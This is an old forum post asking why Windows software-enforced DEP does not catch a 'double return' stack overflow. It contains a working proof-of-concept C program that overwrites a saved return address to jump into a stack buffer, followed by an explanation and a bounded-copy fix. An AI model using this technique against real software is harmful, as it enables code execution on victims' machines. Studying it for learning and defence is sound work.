Software-enforced DEP doesn't work?
iDLER
Guest
Posted: Fri Dec 24, 2004 12:05 pm    Post subject: Software-enforced DEP doesn't work?

Hi, Merry Christmas everyone :-)
The following program is a double-ret stack overflow program. It overwrites
EIP with an address which contains a ret instruction, so the system will
pop the stack again, get the start address of a buffer and jump to it. It
should be a 'data execution', but software-enforced DEP does not catch it. :-S
Why?

/*
Stack based overflows
Double return technique
compile for release (MSVC: _asm is Visual C++ inline assembly)
*/

#include <stdio.h>
#include <string.h>

void doit(char* buf)
{
char smallbuf[10];
memset(smallbuf,0x0,sizeof(smallbuf));
printf("strcpy\n");

//_asm int 3;
_asm nop;

strcpy(smallbuf,buf); // unbounded copy: 20 bytes into a 10-byte stack buffer
}

int main(int argc,char *argv[])
{
char buf[100];

printf("+ Stack based overflow\n+ Double return\n");
memset(buf, 0x0, sizeof(buf));

// The double return
memset(buf,0xcc,12); // 12 bytes of int 3 (fills smallbuf plus padding)
strcat(buf,"\x64\x64\x64\x64"); // SET EBP
strcat(buf,"\x3e\x10\x40\x00"); // SET EIP to 0x0040103e; at that address there is a 'ret'
printf("+ Buffer address: %p\n", buf);

doit(buf);

printf("+ done\n");
return 0;
}
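Two defender-side checks that follow from the question above, added here as an example and not part of the original post. The relevant fact is that software-enforced DEP in Windows XP SP2 only validates structured exception handler chains; it does not stop the CPU from executing instructions fetched from a writable stack page. That enforcement needs hardware DEP on a processor with the NX/XD bit, with DEP switched on for the process. So the first thing to check on the test machine is whether the OS reports NX as enabled, which the real Win32 call `IsProcessorFeaturePresent(PF_NX_ENABLED)` (available from XP SP2) answers. The second, and the actual fix regardless of DEP, is to stop the overflow: `copy_bounded()` and `doit_safe()` are hypothetical replacements for the post's `doit()` that keep the same 10-byte buffer but refuse input that does not fit. On non-Windows builds the NX query is skipped and returns -1.

```c
/* Added example, not the poster's code. Builds with MSVC or gcc. */
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>   /* IsProcessorFeaturePresent, PF_NX_ENABLED */
#endif

/* Same size as smallbuf in the post. */
#define SMALLBUF_SIZE 10

/* Copies src into dst only if it fits, terminating NUL included.
 * Returns 1 on success, 0 if the input would have run past dst.
 * Unlike strcpy(), an over-long input never reaches saved EBP/EIP. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size) {
        return 0;                   /* refuse rather than overflow */
    }
    memcpy(dst, src, len + 1);      /* +1 copies the NUL as well */
    return 1;
}

/* Hypothetical replacement for the post's doit(): bounded copy, same buffer. */
int doit_safe(const char *buf)
{
    char smallbuf[SMALLBUF_SIZE];
    memset(smallbuf, 0, sizeof(smallbuf));
    if (!copy_bounded(smallbuf, sizeof(smallbuf), buf)) {
        printf("rejected: %lu-byte input does not fit in %lu bytes\n",
               (unsigned long)strlen(buf), (unsigned long)sizeof(smallbuf));
        return 0;
    }
    printf("copied: \"%s\"\n", smallbuf);
    return 1;
}

/* 1 = OS reports hardware DEP (NX) enabled, 0 = not reported,
 * -1 = not a Windows build, so the query is skipped. */
int hardware_nx_present(void)
{
#ifdef _WIN32
    return IsProcessorFeaturePresent(PF_NX_ENABLED) ? 1 : 0;
#else
    return -1;
#endif
}

int main(void)
{
    /* Constructed inputs: one that fits, one 20 bytes long like the
     * post's 12 + 4 + 4 byte overflow payload. */
    char overlong[21];
    memset(overlong, 'A', 20);
    overlong[20] = '\0';

    doit_safe("short");
    doit_safe(overlong);

    switch (hardware_nx_present()) {
    case 1:  puts("hardware-enforced DEP (NX) reported enabled"); break;
    case 0:  puts("NX not reported: only software-enforced DEP (SEH checks) applies"); break;
    default: puts("not a Windows build; NX query skipped"); break;
    }
    return 0;
}
```

If `hardware_nx_present()` returns 0 on the XP SP2 box, the stack return in the post is expected to run to completion: nothing in software-enforced DEP inspects a `ret` into a data page. The bounded copy removes the overflow itself, which is the mitigation that does not depend on the CPU.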